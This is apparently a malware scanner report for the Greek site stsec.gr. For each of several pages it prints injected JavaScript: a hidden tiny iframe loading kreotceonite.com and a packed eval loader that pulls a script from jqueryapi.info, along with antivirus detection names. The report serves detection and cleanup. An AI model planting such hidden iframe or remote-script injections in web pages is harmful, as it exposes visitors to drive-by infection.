Malware Scanner report for stsec.gr

Malicious/Suspicious/Total urls checked: 15/0/15

15 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "stsec.gr" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=stsec.gr

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://stsec.gr/	200 OK Content-Length: 55578 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo ... 3346 bytes are skipped ....createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]\|\|e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, ... 15681 bytes are skipped ...200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape)); Antivirus reports: Avast JS:Iframe-EGI [Trj] Fortinet JS/Iframe.KI!tr ESET-NOD32 JS/Iframe.KI
http://stsec.gr/index.php?option=com_content&view=article&id=88&Itemid=54	200 OK Content-Length: 66366 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo ... 3346 bytes are skipped ....createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]\|\|e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, ... 15681 bytes are skipped ...200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape)); Antivirus reports: Avast JS:Iframe-EGI [Trj] Fortinet JS/Iframe.KI!tr ESET-NOD32 JS/Iframe.KI
http://stsec.gr/index.php?option=com_content&view=article&id=88&Itemid=209	200 OK Content-Length: 66373 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo ... 3346 bytes are skipped ....createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]\|\|e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, ... 15681 bytes are skipped ...200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape)); Antivirus reports: Avast JS:Iframe-EGI [Trj] Fortinet JS/Iframe.KI!tr ESET-NOD32 JS/Iframe.KI
http://stsec.gr/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=213	200 OK Content-Length: 48395 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo ... 3346 bytes are skipped ....createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]\|\|e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, ... 15681 bytes are skipped ...200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape)); Antivirus reports: Avast JS:Iframe-EGI [Trj] Fortinet JS/Iframe.KI!tr ESET-NOD32 JS/Iframe.KI
http://stsec.gr/index.php?option=com_content&view=category&layout=blog&id=40&Itemid=214	200 OK Content-Length: 53599 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo ... 3346 bytes are skipped ....createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]\|\|e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, ... 15681 bytes are skipped ...200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape)); Antivirus reports: Avast JS:Iframe-EGI [Trj] Fortinet JS/Iframe.KI!tr ESET-NOD32 JS/Iframe.KI
http://stsec.gr/index.php?option=com_content&view=article&id=105&Itemid=215	200 OK Content-Length: 48976 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo ... 3346 bytes are skipped ....createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]\|\|e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, ... 15681 bytes are skipped ...200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape)); Antivirus reports: Avast JS:Iframe-EGI [Trj] Fortinet JS/Iframe.KI!tr ESET-NOD32 JS/Iframe.KI
http://stsec.gr/index.php?option=com_content&view=category&layout=blog&id=42&Itemid=216	200 OK Content-Length: 47004 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo ... 3346 bytes are skipped ....createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]\|\|e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, ... 15681 bytes are skipped ...200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape)); Antivirus reports: Avast JS:Iframe-EGI [Trj] Fortinet JS/Iframe.KI!tr ESET-NOD32 JS/Iframe.KI
http://stsec.gr/index.php?option=com_content&view=article&id=115&Itemid=217	200 OK Content-Length: 45440 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo ... 3346 bytes are skipped ....createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]\|\|e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, ... 15681 bytes are skipped ...200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape)); Antivirus reports: Avast JS:Iframe-EGI [Trj] Fortinet JS/Iframe.KI!tr ESET-NOD32 JS/Iframe.KI
http://stsec.gr/index.php?option=com_content&view=category&layout=blog&id=44&Itemid=218	200 OK Content-Length: 52202 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo ... 3346 bytes are skipped ....createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]\|\|e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, ... 15681 bytes are skipped ...200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape)); Antivirus reports: Avast JS:Iframe-EGI [Trj] Fortinet JS/Iframe.KI!tr ESET-NOD32 JS/Iframe.KI
http://stsec.gr/index.php?option=com_content&view=article&id=128&Itemid=224	200 OK Content-Length: 45152 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo ... 3346 bytes are skipped ....createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]\|\|e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, ... 15681 bytes are skipped ...200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape)); Antivirus reports: Avast JS:Iframe-EGI [Trj] Fortinet JS/Iframe.KI!tr ESET-NOD32 JS/Iframe.KI
http://stsec.gr/index.php?option=com_content&view=article&id=140&Itemid=227	200 OK Content-Length: 45557 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo ... 3346 bytes are skipped ....createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]\|\|e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, ... 15681 bytes are skipped ...200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape)); Antivirus reports: Avast JS:Iframe-EGI [Trj] Fortinet JS/Iframe.KI!tr ESET-NOD32 JS/Iframe.KI
http://stsec.gr/index.php?option=com_content&view=category&layout=blog&id=48&Itemid=225	200 OK Content-Length: 46638 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo ... 3346 bytes are skipped ....createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]\|\|e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, ... 15681 bytes are skipped ...200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape)); Antivirus reports: Avast JS:Iframe-EGI [Trj] Fortinet JS/Iframe.KI!tr ESET-NOD32 JS/Iframe.KI
http://stsec.gr/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=226	200 OK Content-Length: 49070 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo ... 3346 bytes are skipped ....createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]\|\|e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, ... 15681 bytes are skipped ...200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var 